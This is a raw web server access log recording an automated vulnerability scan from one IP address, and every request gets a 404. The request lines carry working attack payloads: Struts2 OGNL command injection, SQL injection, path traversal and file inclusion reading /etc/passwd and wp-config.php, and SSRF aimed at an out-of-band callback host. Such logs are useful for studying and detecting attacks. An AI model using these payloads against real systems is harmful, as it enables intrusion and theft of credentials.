137.220.197.141 - - [21/Jan/2024:00:35:32 +0100] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:32 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:34 +0100] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:36 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:36 +0100] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:38 +0100] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:40 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:35:53 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:36:27 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:36:56 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:21 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:24 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsoge1t43eg9z9h4n.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:24 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:37 +0100] "GET /Umbraco/feedproxy.aspx?url=http://cmm00rc3m87t5g88qsog9w4ju5fd6dimw.oast.live HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:39 +0100] "GET /index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(999999999)),1) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:37:47 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:04 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:09 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:11 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:21 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:34 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:38:46 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:39:07 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:39:18 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:39:32 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:39:37 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:39:59 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:40:06 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:40:20 +0100] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:40:21 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:40:55 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:41:38 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:41:59 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:42:15 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:42:21 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:42:38 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:42:50 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:43:03 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:43:19 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:43:24 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:43:45 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:43:51 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:44:03 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:44:16 +0100] "GET /system/console?.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:44:23 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:44:50 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:45:56 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:46:09 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:46:54 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:47:51 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:48:10 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:48:14 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:48:17 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:49:26 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:50:31 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:50:46 +0100] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:51:21 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:51:41 +0100] "GET /?author=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:51:47 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:52:02 +0100] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:52:47 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:55:07 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:55:21 +0100] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:13 +0100] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:15 +0100] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:17 +0100] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:19 +0100] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:21 +0100] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:23 +0100] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:25 +0100] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:27 +0100] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:57:30 +0100] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:58:31 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:58:33 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:31 +0100] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:33 +0100] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:35 +0100] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:37 +0100] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:39 +0100] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:41 +0100] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:43 +0100] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:45 +0100] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:00:59:47 +0100] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:00 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:01 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:22 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:24 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:49 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:02:51 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:05:26 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:50 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:52 +0100] "GET /cgi-bin/status HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:53 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:54 +0100] "GET /cgi-bin/stats HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:56 +0100] "GET /cgi-bin/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:06:58 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:07:00 +0100] "GET /test.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:07:02 +0100] "GET /debug.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:07:03 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:07:03 +0100] "GET /cgi-bin/test-cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:07:16 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:10:21 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:10:26 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:10:28 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:11:10 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:11:33 +0100] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:12:24 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:12:26 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
78.108.177.50 - - [21/Jan/2024:01:13:16 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:01:13:17 +0100] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:13:19 +0100] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:01:14:18 +0100] "POST /boardDataWW.php HTTP/1.1" 404 952
